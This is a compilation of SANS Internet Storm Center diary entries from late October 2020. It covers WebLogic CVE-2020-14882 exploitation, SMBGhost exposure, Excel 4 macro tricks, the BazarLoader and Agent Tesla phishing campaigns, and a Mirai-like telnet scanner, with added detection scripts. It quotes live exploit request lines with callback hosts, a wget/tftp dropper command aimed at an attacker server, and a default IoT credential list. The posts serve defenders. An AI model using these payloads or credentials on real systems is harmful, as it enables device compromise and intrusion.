ISC Stormcast For Friday, October 30th 2020 https://isc.sans.edu/podcastdetail.html?id=7232, (Fri, Oct 30th)
[This post is based on late-breaking news we are still investigating. Please send us any corrections you may have. We are in the process of validating and hopefully understanding all the details ourselves. Check back for updates]
Just about a week ago, as part of a massive quarterly "Critical Patch Update" (aka "CPU"), Oracle patched CVE-2020-14882 in WebLogic. Oracle at the time assigned it a CVSS score of 9.8. We are now seeing active exploitation of the vulnerability against our honeypot after PoC exploits had been published.
Vulnerable WebLogic Versions:
10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
The exploitation of the vulnerability is trivial. For example, these are the exploit requests we are currently seeing:
[the honeypot's IP has been replaced with AAA.BBB.CCC.DDD. Spaces added to allow for line breaks ]
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle= com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec(%27cmd /c
GET /console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession( \"java.lang.Runtime.getRuntime().exec( 'nslookup%20AAA.BBB.CCC.DDD.0efp3gmy20ijk3tx20mqollbd2jtfh4.burpcollaborator.net')
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec( %27ping%20AAA.BBB.CCC.DDD.uajiak.dnslog.cn%27);%22);
These exploit attempts are right now just verifying if the system is vulnerable. Our honeypots (up to now) do not return the "correct" response, and we have not seen follow-up requests yet.
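As an added detection example (my own code, not the honeypot's), the function below double-decodes a request line, resolves the path, and flags the two traits of the probes above: a path that starts under /console/images/ but normalises to console.portal, and a handle parameter naming mvel2.sh.ShellSession or java.lang.Runtime. The sample request lines are constructed after the ones shown, with a placeholder callback hostname.

```python
from urllib.parse import unquote

def decode_twice(s):
    """The probes above are double URL-encoded (%252E -> %2E -> '.'), so decode twice."""
    return unquote(unquote(s))

def normalise_path(path):
    """Decode, then resolve '.' and '..' segments the way the servlet container will."""
    parts = []
    for seg in decode_twice(path).split("/"):
        if seg == "..":
            if parts:
                parts.pop()
        elif seg not in ("", "."):
            parts.append(seg)
    return "/" + "/".join(parts)

def parse_query(query):
    """Split the query string by hand: the handle value carries ';' and '(' characters
    that parse_qs treats as separators on some Python versions."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[decode_twice(key).lower()] = decode_twice(value)
    return params

def check_request_line(request_line):
    """Return the reasons a request line looks like a CVE-2020-14882 probe ([] = clean)."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return ["malformed request line"]
    raw_path, _, query = target.partition("?")
    reasons = []
    resolved = normalise_path(raw_path)
    # 1. Starts under the unauthenticated /console/images/ tree but resolves to the
    #    console.portal handler: the traversal every probe above relies on.
    if raw_path.lower().startswith("/console/images/") and resolved.lower().endswith("/console/console.portal"):
        reasons.append("traversal from /console/images/ to " + resolved)
    # 2. A handle parameter naming a shell session or Runtime is never legitimate.
    handle = parse_query(query).get("handle", "")
    for marker in ("mvel2.sh.ShellSession", "java.lang.Runtime"):
        if marker in handle:
            reasons.append("handle parameter contains " + marker)
    return reasons

# Constructed sample request lines modelled on the honeypot requests above; the callback
# hostname is a placeholder, not a real indicator.
SAMPLE_REQUESTS = [
    "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle="
    "com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec("
    "%27ping%20callback.example.invalid%27);%22); HTTP/1.1",
    "GET /console/images/logo.gif HTTP/1.1",                                  # benign static file
    "GET /console/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1",  # normal console use
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(line.split(" ", 2)[1][:48], "->", check_request_line(line) or "clean")
```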
Currently, exploit attempts originate from these 4 IP addresses:
First IP seen. Around noon UTC Oct 18th.
attempting to ping [some id].dnslog.cn
Address assigned to China Unicom
attempting to ping [victim ip].uajiak.dnslog.cn
Address assigned to Linode (USA)
At this point, the most prolific scanner. Attempting to execute "cmd /c"?
The address is assigned to MivoCloud (Moldova)
pinging [some ID].burpcollaborator.net
Address assigned to Datacamp Ltd (HongKong)
I am in the process of notifying the ISPs.
ISC Stormcast For Thursday, October 29th 2020 https://isc.sans.edu/podcastdetail.html?id=7230, (Thu, Oct 29th)
You probably remember that back in March, Microsoft released a patch for a vulnerability in SMBv3 dubbed SMBGhost (CVE-2020-0796), since at that time, it received as much media attention as was reasonable for a critical (CVSS 10.0) vulnerability in Windows, which might lead to remote code execution.
Luckily, achieving RCE through SMBGhost turned out to be anything but simple so although the first public exploits appeared fairly quickly, they used the vulnerability “only” for local privilege escalation. It wasn’t until June that a PoC for achieving RCE was published. Since release of this PoC was again met with wide attention from the media, one might reasonably expect that by now, most of the vulnerable machines would have been patched – especially those accessible from the internet.
Going by data I’ve gathered from Shodan over the last eight months, this doesn’t appear to be true, however.
Besides scanning for open ports and running services, Shodan is also capable of identifying machines/IPs which are impacted by specific vulnerabilities – you may try this yourself if you have one of the higher-level accounts by using the search filter vuln (e.g. “vuln:cve-2020-0796”). I’m unsure what method Shodan uses to determine whether a certain machine is vulnerable to SMBGhost, but if its detection mechanism is accurate, it would appear that there are still over 103 000 affected machines accessible from the internet. This would mean that a vulnerable machine hides behind approximately 8% of all IPs which have port 445 open.
The following chart shows countries with most detections – I've included those with at least 2 000 IPs detected as vulnerable by Shodan.
It is hard to say why so many unpatched machines are still out there. Microsoft did release the patch for CVE-2020-0796 out-of-band instead of as part of its usual Patch Tuesday set of fixes, but that was the only unusual thing about it, and it doesn’t make much sense that this would be the reason why it still isn't applied on so many systems… In any case, if the numbers provided by Shodan are accurate, they are concerning to say the least, especially since SMBGhost – as an RCE – is “wormable”. If for whatever reason you still haven't patched any of your systems, now would seem to be a good time to do so.
Hopefully, we won’t see any worms or other attempts at mass exploitation of CVE-2020-0796 any time soon, but who knows – it would perhaps be timely given the name of the vulnerability and the upcoming Halloween…
ISC Stormcast For Wednesday, October 28th 2020 https://isc.sans.edu/podcastdetail.html?id=7228, (Wed, Oct 28th)
ISC Stormcast For Tuesday, October 27th 2020 https://isc.sans.edu/podcastdetail.html?id=7226, (Tue, Oct 27th)
Excel 4 macros are composed of formulas (commands) and values stored inside a sheet.
Each sheet in a spreadsheet can be "visible", "hidden" or "very hidden". Malware authors will often make Excel 4 macro sheets hidden or very hidden.
In .xls files, spreadsheet data is stored in the Workbook stream as BIFF records. There is a BIFF record for sheets: the BOUNDSHEET record. The byte value at position 5 in a BOUNDSHEET record defines the visibility of a sheet: visible (0x00), hidden (0x01) or very hidden (0x02):
Encoding the visibility of a sheet is done with the 2 least significant bits. Per Microsoft's documentation, the 6 most significant bits are unused and must be ignored. In spreadsheets created with Excel, these bits are set to 0.
From time to time, I find malicious Excel 4 macro documents, where these bits are not zero:
oledump's plugin_biff will report this: "reserved bits not zero".
The "visibility" value is 0x0A, that's 0x08 + 0x02: thus the sheet is very hidden (0x02).
Excel has no problem at all opening a spreadsheet like this (the unused bits must be ignored). But if you use or develop detection rules (YARA, Suricata, ...), be aware that these unused bits can be set to 1 instead of 0.
You might wonder: 2 bits encode the visibility, but only three values are defined: visible (0x00), hidden (0x01) or very hidden (0x02).
What about 0x03?
When a sheet's visibility is set to 0x03 (I do this by patching the .xls with a binary editor), my tests with Excel 2016 and 2019 show that an Excel 4 macro sheet will behave as "very hidden", and the macro code will be executed.
However, before a user is prompted to enable macros, that user will have to click through extra warnings.
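To check BOUNDSHEET records for exactly these oddities, here is an added Python example (my own code, not oledump's plugin_biff): it walks a BIFF stream, decodes each BOUNDSHEET, and flags non-zero reserved bits, the undefined value 0x03, and hidden Excel 4 macro sheets. The Workbook stream bytes are constructed inline; for a real .xls you would read the 'Workbook' stream out of the OLE container (for example with olefile).

```python
import struct

BOF, BOUNDSHEET = 0x0809, 0x0085
VISIBILITY = {0x00: "visible", 0x01: "hidden", 0x02: "very hidden", 0x03: "undefined (0x03)"}
SHEET_TYPES = {0x00: "worksheet", 0x01: "Excel 4 macro sheet", 0x02: "chart", 0x06: "VBA module"}

def iter_biff_records(stream):
    """Walk a BIFF stream: each record is a 2-byte type, a 2-byte length, then the data."""
    pos = 0
    while pos + 4 <= len(stream):
        rtype, length = struct.unpack_from("<HH", stream, pos)
        data = stream[pos + 4:pos + 4 + length]
        if len(data) < length:          # truncated record: stop rather than misparse
            break
        yield rtype, data
        pos += 4 + length

def parse_boundsheet(data):
    """BOUNDSHEET data: lbPlyPos (4 bytes), hsState+reserved (1 byte, the 5th byte),
    dt (1 byte), then the sheet name as cch, flags and characters."""
    offset = struct.unpack_from("<I", data, 0)[0]
    grbit, sheet_type, cch, flags = data[4], data[5], data[6], data[7]
    if flags & 0x01:                    # fHighByte set: UTF-16LE characters
        name = data[8:8 + 2 * cch].decode("utf-16-le")
    else:                               # compressed: one byte per character
        name = data[8:8 + cch].decode("latin-1")
    return {"name": name, "offset": offset, "visibility": grbit & 0x03,
            "reserved_bits": grbit & 0xFC, "sheet_type": sheet_type}

def analyze_workbook_stream(stream):
    """List every sheet and flag the oddities discussed above."""
    results = []
    for rtype, data in iter_biff_records(stream):
        if rtype != BOUNDSHEET:
            continue
        sheet = parse_boundsheet(data)
        sheet["visibility_name"] = VISIBILITY[sheet["visibility"]]
        sheet["type_name"] = SHEET_TYPES.get(sheet["sheet_type"], "other")
        flags = []
        if sheet["reserved_bits"]:
            flags.append("reserved bits not zero (0x%02X)" % sheet["reserved_bits"])
        if sheet["visibility"] == 0x03:
            flags.append("undefined visibility value 0x03")
        if sheet["sheet_type"] == 0x01 and sheet["visibility"] != 0x00:
            flags.append("hidden Excel 4 macro sheet")
        sheet["flags"] = flags
        results.append(sheet)
    return results

def build_boundsheet(name, visibility_byte, sheet_type, offset=0x200):
    """Assemble a BOUNDSHEET record; used here only to build the constructed sample."""
    body = struct.pack("<IBBBB", offset, visibility_byte, sheet_type, len(name), 0)
    body += name.encode("latin-1")
    return struct.pack("<HH", BOUNDSHEET, len(body)) + body

# Constructed Workbook stream: a BIFF8 BOF record, an ordinary sheet, and an Excel 4 macro
# sheet whose visibility byte is 0x0A (very hidden, plus a reserved bit set).
SAMPLE_STREAM = (
    struct.pack("<HH", BOF, 16) + struct.pack("<HHHHII", 0x0600, 0x0005, 0x0DBB, 0x07CC, 0, 0)
    + build_boundsheet("Sheet1", 0x00, 0x00)
    + build_boundsheet("Macro1", 0x0A, 0x01)
)

if __name__ == "__main__":
    # Real file: stream = olefile.OleFileIO(path).openstream("Workbook").read()
    for sheet in analyze_workbook_stream(SAMPLE_STREAM):
        print(sheet["name"], sheet["type_name"], sheet["visibility_name"], sheet["flags"])
```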
ISC Stormcast For Monday, October 26th 2020 https://isc.sans.edu/podcastdetail.html?id=7224, (Mon, Oct 26th)
Programs written in the Object Pascal (Delphi) programming language have their strings stored in the executable file as Pascal strings. A Pascal string (or P-string) is a string that is stored internally with a length prefix: an integer that counts the number of characters in the string.
When analyzing Delphi malware, it is useful to extract its Pascal strings (instead of extracting all strings). You can do this now with an update to my strings.py tool.
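As an added example (my own code, not strings.py), the scanner below extracts length-prefixed strings from a byte buffer: at each offset it reads a 1-, 2- or 4-byte little-endian length and accepts the run only if exactly that many printable bytes follow, which is what separates a P-string from the zero-terminated C strings a generic strings tool reports. The sample buffer is constructed inline.

```python
import struct

# Printable ASCII plus tab, LF and CR; anything else ends a candidate string.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}
LENGTH_FORMATS = {1: "<B", 2: "<H", 4: "<I"}

def extract_pascal_strings(data, prefix_size=1, min_length=4):
    """Yield (offset, text) for each length-prefixed run of printable bytes.

    prefix_size selects a 1-, 2- or 4-byte little-endian length field; a Delphi
    ShortString uses one byte. A run is accepted only if exactly `length` printable
    bytes follow the prefix.
    """
    fmt = LENGTH_FORMATS[prefix_size]
    pos = 0
    while pos + prefix_size <= len(data):
        length = struct.unpack_from(fmt, data, pos)[0]
        start, end = pos + prefix_size, pos + prefix_size + length
        if min_length <= length and end <= len(data) and all(b in PRINTABLE for b in data[start:end]):
            yield pos, data[start:end].decode("ascii")
            pos = end      # assumption: strings do not overlap, so resume after this one
        else:
            pos += 1

def pascal_strings(data, prefix_size=1, min_length=4):
    return list(extract_pascal_strings(data, prefix_size, min_length))

# Constructed sample buffer: two 1-byte-prefixed strings amid filler bytes, followed by a
# zero-terminated C string that has no length prefix and must not be reported.
SAMPLE = (b"\x00\xff" + bytes([5]) + b"Hello" + b"\x00"
          + bytes([12]) + b"Delphi rules" + b"\x00"
          + b"plain C string\x00")
# The same text with a 2-byte length prefix is invisible to a 1-byte scan.
SAMPLE_WIDE = struct.pack("<H", 5) + b"Hello"

if __name__ == "__main__":
    for offset, text in pascal_strings(SAMPLE):
        print("0x%04X %s" % (offset, text))
```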
I've also recorded a video showing this new feature:
I have well over 2 years of honeypot logs and only started seeing the CensysInspect user-agent in my logs about 2 months ago. Most of us are familiar with Shodan and often use it to find what is or was exposed to the Internet. Censys is an alternative site to search the same kind of data, with 3 available search options: by IPv4, websites and certificates.
This is an example of what can be seen in webserver logs:
20201024-071114: 192.168.25.9:80-18.104.22.168:54072 data 'GET / HTTP/1.1\r\nHost: 70.50.xx.xx\r\nUser-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n'
This scanner works by grabbing banners and collecting all information leaked by insecure devices, which gets categorized and stored for "research" purposes. According to their FAQ, it uses ZMap, which "[...] can scan the entire public IPv4 address space in under 45 minutes.", and ZGrab, which "can perform a TLS connection and collect the root HTTP page of all hosts ZMap finds on TCP/443." The information captured is like what Shodan provides:
This is an alternative way to find Internet-facing systems, open ports and the services listening on them. Censys probes for more than just the standard well-known ports. These are some of the ports probed, starting with the most frequent (more than 1000 distinct ports in total over 2 months).
IP Ranges included in the probes:
Russian State-Sponsored APT Actor Compromises U.S. Gov Targets https://us-cert.cisa.gov/ncas/alerts/aa20-296a, (Fri, Oct 23rd)
Sooty was developed with the intent of helping SOC analysts automate parts of their work flow. Sooty serves to perform the more mundane and routine checks SOC analysts typically undertake with the hope of freeing the analyst to conduct deeper analysis in a more efficient and timely manner.
Download or clone Sooty from its GitHub repository.
I cloned Sooty into my tools directory with git clone https://github.com/TheresAFewConors/Sooty.git. You’ll need a current implementation of Python 3.x, and be sure to pull in Sooty’s requirements with pip install -r requirements.txt; I was missing a number of them. You’ll also need to drop your API keys into their assigned slots in example_config.yaml and rename it config.yaml. The GitHub repo’s Requirements and Installation section has links for each of the services you’ll want API keys for, and a few pointers for setting them up properly.
Thereafter, python Sooty.py will get you started. Figure 1 represents the menu you’ll be presented with.
Figure 1: Sooty menu
I’ve had the recent pleasure of hunting duties and Sooty went to immediate use for preliminary assessment purposes. An instant IP reputation result is seen in Figure 2.
Figure 2: Sooty IP reputation
Suffice it to say, don’t count that IP on the good guy list.
Figure 3 exhibits a check of one of my email addresses.
Figure 3: Sooty email reputation
The email reputation check includes Have I Been Pwned results; you can see the answer to that question is affirmative.
Sooty option 7 will run URLs through urlscan.io as seen in Figure 4.
Figure 4: Sooty urlscan
The decoders, DNS, and phishing checks are handy for…you know…decoding, DNS, and phishing checks as follows.
Decoders: ProofPoint, URLs, Office SafeLinks, URL unShortener, Base64, and Cisco Password 7.
DNS: Reverse DNS, DNS, and WHOIS lookups
Phishing: Analyze Email, Email Addresses for Known Activity, Generate an Email Template based on Analysis, Analyze an URL with Phishtank, and HaveIBeenPwned
I’m also fond of the hashing functions, particularly Option 3: Check a hash for known malicious activity. As seen in Figure 5, Sooty calls the VirusTotal API, and results are returned very quickly.
Figure 5: Sooty hash check
This is an incredibly handy, convenient tool; it really does deliver as promised, and I can vouch for it during real operations, not just toolsmith lab time. I do hope support continues for it. Give it a go and enjoy!
Cheers…until next time.
ISC Stormcast For Friday, October 23rd 2020 https://isc.sans.edu/podcastdetail.html?id=7222, (Fri, Oct 23rd)
BazarLoader phishing lures: plan a Halloween party, get a bonus and be fired in the same afternoon, (Thu, Oct 22nd)
Phishing messages distributing BazarLoader have come to be commonplace in the past six months, but in the last couple of weeks I’ve been seeing more and more e-mails spreading this malware caught in my quarantine. Although the contents of these messages differ, their appearance is usually similar – they all contain a fairly long link to Google Docs along with a text part instructing the recipient to visit the included URL. The lures range quite widely, and the uncoordinated way in which the messages are distributed can result in a single recipient receiving fairly amusing combinations of messages. Given the current global not-so-optimistic situation, I thought I’d try to share something a little bit “lighter” today and take a look at some of these messages, but before we get to that, let’s take a short look at the URLs distributed in the e-mails.
Should a recipient click on the Google Docs link, they would be directed to a web page containing a fake preview of a document corresponding to the lure mentioned in the e-mail. The page would also contain download links, from which a victim might seemingly download the promised document. The downloaded file would however instead be a BazarLoader binary.
It is worth mentioning that in the latest campaign I’ve seen (the case of the “Halloween survey” shown above), the threat actors appeared to use Slack to host the final payload, using the following URL: hxxps[:]//files-origin[.]slack[.]com/files-pri/T012C3R8D0U-F01D639HZJQ/download/report-review20-10[.]exe?pub_secret=e33269e24f
The link was no longer working when I tried it, but from what I’ve read about Bazar, use of Slack would seem to be a new way of distributing its malicious executables. But back to the phishing e-mails themselves...
As we’ve mentioned, the messages are visually very similar, but the lures differ significantly. And since distribution of these e-mails seems to be completely uncoordinated, reading through those which one might receive in a single week or two might make one wonder whether the threat actors aren’t subtly trying to make us embrace the old U.S. Army motto of “Be All You Can Be”.
At least, the reason I get this feeling is that, going only by the messages addressed to me personally in the last few weeks:
- I have been probably the most complained-about employee in the company (and I have received several substantial pay cuts because of that)
- I was fired (probably due to me ignoring all the customer complaint reviews)
- I have been complained about a number of additional times (I guess they changed their minds on the "termination issue"?)
- I was awarded a bonus for being such a good employee (I guess our financial department didn’t hear about me not doing so well with customers…)
- I was asked to read a company report (hopefully not one mentioning me by name and heavily discussing how to avoid customer complaints)
- I was asked to participate in a company survey on improving working conditions (I guess they decided bad working conditions were the main reason for me not being too good with customers...)
- And finally, this Tuesday I was asked to tell the company how we should celebrate Halloween this year (I guess they have taken my thoughts on how to improve the working conditions to heart?)
Reading through all of these e-mails (and many more), one can’t help but wonder whether sending out similarly looking messages to the same addresses over and over again is really effective for the attackers... Unless their aim is to make the more impressionable recipients feel a bit unsure about the dependability of their memory when it comes to their interactions with customers.
Although I don’t mean to make light of phishing, as it is an undeniable threat, it is good to sometimes take a look at its more amusing side. My experience is that this is especially true when it comes to security awareness courses, as humor tends to make any examples "stick" a bit more. And since October is Cybersecurity Awareness Month[1,2], if you haven’t yet shared any tips about how to stay a bit safer online with your less technically-oriented colleagues, maybe showing them the contradictory tone of some of the phishing lures above might not be a bad start...
ISC Stormcast For Thursday, October 22nd 2020 https://isc.sans.edu/podcastdetail.html?id=7220, (Thu, Oct 22nd)
20 new Cisco security advisories for ASA and Firepower with CVSS>7: https://tools.cisco.com/security/center/publicationListing.x, (Wed, Oct 21st)
ISC Stormcast For Wednesday, October 21st 2020 https://isc.sans.edu/podcastdetail.html?id=7218, (Wed, Oct 21st)
For the past several months, I've been tracking a campaign that sends rather odd-looking emails like this
The sender (from) address on these emails is usually impersonating an existing shipping or logistics company. The ships mentioned in the emails actually exist, and according to marinetraffic.com, the vessels are in fact traveling in the area and with cargo that makes the content of such harbor berthing reservation and cargo manifest emails seem plausible.
Between two and five emails of this style arrive in one of my spam traps every weekday. The scammers don't work on the weekends, and sometimes they take a full week off. But they inevitably come back and try again. Most emails are received between 2am and 4am UTC, which - assuming the mails are sent during the local morning - could suggest that the sender is sitting somewhere between Bangkok and Shanghai. The sending email servers are everywhere, but show some clustering in Malaysia.
The emails themselves display a casual familiarity with marine jargon, tonnages, draft, cargo types, DWT, routing, ETAs and marine radio procedures. They would be mildly entertaining to read, before getting filed in the spam folder ... if it weren't for the attachment.
Sized between 500k and 1.5m, the attachment type of choice by the bad guys for the past several months has been a ".cab". Virustotal detection for the samples varies, and ranges from "none" at time of receipt, to 50+ engines a couple days later.
Two recent samples from this campaign
The malware in question happens to be Agent Tesla spyware. Since April, my sandbox collected several hundred distinct Agent Tesla samples from this actor. Agent Tesla exfiltrates stolen data via HTTPS, and more commonly, over email (SMTPS, tcp/587). While the former (HTTPS) destinations tend to be rather random, the latter (email) destinations are often hosted on email domains that also belong to shipping companies. This indicates to me that the campaign is likely successful to some extent, and over the months in fact has managed to steal valid email credentials (and probably more than that) from firms in the shipping and logistics sector.
Indicators for the emails:
- look for emails with *.cab attachment, with the email subject in all-uppercase
- look for outbound attempts to tcp/587 destined for email servers other than your own
Current tcp/587 C&C domains used are mail.trinityealtd[.]com and smtp.hyshippingcn[.]com, but these destinations are changing daily.
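The two indicators above, turned into a small added detection example (my own code, not from the diary): one check over mail metadata for a .cab attachment paired with an all-uppercase subject, and one over outbound connection log lines for tcp/587 to mail servers other than your own. The mail records, log lines and the allowed-server set are constructed placeholders.

```python
import re

# Constructed mail metadata, as an MTA hook or mail parser would hand it over
# (not real campaign messages).
SAMPLE_MAILS = [
    {"subject": "MV OCEAN PRIDE - BERTHING RESERVATION AND CARGO MANIFEST",
     "attachments": ["manifest_0457.cab"]},
    {"subject": "Re: draft survey next week", "attachments": ["survey.pdf"]},
    {"subject": "URGENT INVOICE", "attachments": ["invoice.zip"]},
]

# Constructed outbound connection log: "<timestamp> <src> -> <dst>:<dport>/<proto>"
SAMPLE_FLOWS = """\
2020-10-20T03:12:44Z 10.0.0.15 -> smtp.mycompany.example:587/tcp
2020-10-20T03:13:02Z 10.0.0.21 -> mail.exfil-example.invalid:587/tcp
2020-10-20T03:13:09Z 10.0.0.21 -> cdn.example.net:443/tcp
"""

# Assumption: the submission hosts your own clients are allowed to talk to.
OWN_MAIL_SERVERS = {"smtp.mycompany.example"}

FLOW_RE = re.compile(r"^(\S+)\s+(\S+)\s+->\s+([^:\s]+):(\d+)/(\w+)$")

def is_suspicious_mail(mail):
    """Indicator 1: a .cab attachment together with an all-uppercase subject."""
    has_cab = any(name.lower().endswith(".cab") for name in mail["attachments"])
    return has_cab and mail["subject"].isupper()

def suspicious_submissions(flow_text, own_servers):
    """Indicator 2: outbound tcp/587 to any mail server that is not one of ours."""
    hits = []
    for line in flow_text.splitlines():
        match = FLOW_RE.match(line.strip())
        if not match:
            continue               # skip lines in another format rather than misparse
        ts, src, dst, dport, proto = match.groups()
        if proto == "tcp" and dport == "587" and dst.lower() not in own_servers:
            hits.append((ts, src, dst))
    return hits

if __name__ == "__main__":
    for mail in SAMPLE_MAILS:
        print(is_suspicious_mail(mail), mail["subject"])
    for hit in suspicious_submissions(SAMPLE_FLOWS, OWN_MAIL_SERVERS):
        print("unexpected tcp/587 submission:", hit)
```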
The campaign has a lot of commonalities with what BitDefender reported in April for the Oil&Gas industry https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/.
If you have additional information on this campaign, please let us know, or share in the comments below.
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Last week, I found an interesting Python script that behaves like a Mirai bot. It scans for vulnerable devices exposing their telnet (TCP/23) interface in the wild, then tries to connect using a dictionary of credentials. The script has been uploaded to VT and has a low score of 2/59. Indeed, it does not contain suspicious strings nor API calls. Just a simple but powerful scanner.
Here are the commands injected when a device is found with vulnerable credentials:
rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://22.214.171.124/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 126.96.36.199 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 188.8.131.52; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 184.108.40.206 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh" #command to send
The IP address 220.127.116.11 is offline at the moment but already has a bad reputation and is present in multiple blocklists.
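As an added example (my own code, not part of the script discussed), the parser below pulls the download hosts and script names out of an injected command string like the one above, handling the three fetch syntaxes it uses (wget URL, both tftp forms, busybox ftpget), so they can be fed to a blocklist or hunted for on devices. The sample command is constructed in the same shape, with the documentation address 192.0.2.10 standing in for the real server.

```python
import shlex
from urllib.parse import urlparse

def extract_download_iocs(command):
    """Return (protocol, host, filename) for every wget/tftp/ftpget fetch in an injected
    command string, so the hosts can be blocked and the filenames hunted for."""
    iocs = []
    for segment in command.split(";"):
        try:
            tokens = shlex.split(segment)
        except ValueError:          # unbalanced quotes: skip the segment rather than crash
            continue
        if not tokens:
            continue
        tool, args = tokens[0], tokens[1:]
        if tool == "wget" and args:
            url = urlparse(args[-1])
            iocs.append(("http", url.hostname, url.path.rsplit("/", 1)[-1]))
        elif tool == "tftp":
            if "-g" in args and "-r" in args:       # busybox form: tftp -r FILE -g HOST
                host, fname = args[args.index("-g") + 1], args[args.index("-r") + 1]
            elif "-c" in args and len(args) >= 3:   # classic form: tftp HOST -c get FILE
                host, fname = args[0], args[-1]
            else:
                continue
            iocs.append(("tftp", host, fname))
        elif tool == "ftpget":
            # busybox: ftpget [OPTIONS] HOST [LOCAL_FILE] REMOTE_FILE
            # -u/-p/-P take a value, -v does not
            positional, i = [], 0
            while i < len(args):
                if args[i] in ("-u", "-p", "-P"):
                    i += 2
                elif args[i].startswith("-"):
                    i += 1
                else:
                    positional.append(args[i])
                    i += 1
            if len(positional) >= 2:
                iocs.append(("ftp", positional[0], positional[-1]))
    return iocs

def download_hosts(iocs):
    """Distinct hosts to block at the egress firewall."""
    return sorted({host for _proto, host, _name in iocs if host})

# Constructed command string in the shape of the one quoted above; 192.0.2.10 is a
# documentation address standing in for the real download server.
SAMPLE_COMMAND = (
    "cd /tmp || cd /var/run || cd /; wget http://192.0.2.10/bins.sh; chmod 777 bins.sh; sh bins.sh; "
    "tftp 192.0.2.10 -c get tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.0.2.10; sh tftp2.sh; "
    "ftpget -v -u anonymous -p anonymous -P 21 192.0.2.10 ftp1.sh ftp1.sh; sh ftp1.sh"
)

if __name__ == "__main__":
    found = extract_download_iocs(SAMPLE_COMMAND)
    for ioc in found:
        print(ioc)
    print("block:", download_hosts(found))
```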
Here is the list of credential pairs tested:combo = [ "root:root", "root:", "admin:admin", "telnet:telnet", "support:support", "user:user", "admin:", "admin:password", "root:vizxv", "root:admin", "root:xc3511", "root:888888", "root:xmhdipc", "root:default", "root:juantech", "root:123456", "root:54321", "root:12345", "root:pass", "ubnt:ubnt", "root:klv1234", "root:Zte521", "root:hi3518", "root:jvbzd", "root:anko", "root:zlxx.", "root:7ujMko0vizxv", "root:7ujMko0admin", "root:system", "root:ikwb", "root:dreambox", "root:user", "root:realtek", "root:00000000", "admin:1111111", "admin:1234", "admin:12345", "admin:54321", "admin:123456", "admin:7ujMko0admin", "admin:1234", "admin:pass", "admin:meinsm", "admin:admin1234", "root:1111", "admin:smcadmin", "admin:1111", "root:666666", "root:password", "root:1234", "root:klv123", "Administrator:admin", "service:service", "supervisor:supervisor", "guest:guest", "guest:12345", "guest:12345", "admin1:password", "administrator:1234", "666666:666666", "888888:888888", "tech:tech", "mother:fucker" ]
The script is pretty well written and is multi-threaded to speed up the scan:
for l in xrange(threads):
    try:
        t = threading.Thread(target=worker)
        t.start()
    except:
        pass
The script does not implement a random IP address generator; it just uses the zmap scanner:
zmap -p23 -N 10000 -f saddr -q --verbosity=0
This command will return 10000 IP addresses that expose a telnet port.
The question that arises when you find this kind of script is: "Can we really find so many devices exposing a telnet interface in the wild in 2020?". I did my own test and launched the above zmap command. In a few seconds, 10K IP addresses were returned. Then, I used the nmap scanner with the 'banner' script to grab telnet banners:
nmap -sC --script=banner -p 23 -Pn -iL open-telnet.txt -oA telnet-banners -v -n
I found a lot of banners that disclose the type of devices (routers, WiFi access points, switches, VoIP gateways, IoT, ...). More interesting, I found some devices still bricked by BrickerBot:
# telnet x.x.x.x
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
Internet Chemotherapy Part 11 - BrickerBot (TM) Source Drop (7/31 2020): hxxp://depastedihrn3jtw[.]onion/show.php?md5=20735856837081a18e6f0edf2c1e8d76
Internet Chemotherapy Part 12 - Third Time is the Charm? (9/6 2020) hxxp://depastedihrn3jtw[.]onion/show.php?md5=4c17df6b30ed2704082465d9a1c4ea86
DeepPaste is temperamental (unreachable 75% of time) so if the links are not loading then try again later.
Update 10/3: So I have been looking into reconditioning Tenda/Intelbras, Genexis and Zte routers.. Still WIP but seen some positive impact over the last few days/weeks.
Update 10/6: ..and Totolink..
10/9: some new tricks for netis, TVT and Tata Consulting.. what next?
Update 10/17: Getting in the Zhone.. seeing real IoT action in 2020 at last
(none) login:
I found plenty of notifications and disclaimers warning you that connecting to the device is prohibited, that your IP will be logged, etc. Please don't waste your time implementing such useless banners, just get rid of telnet!
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant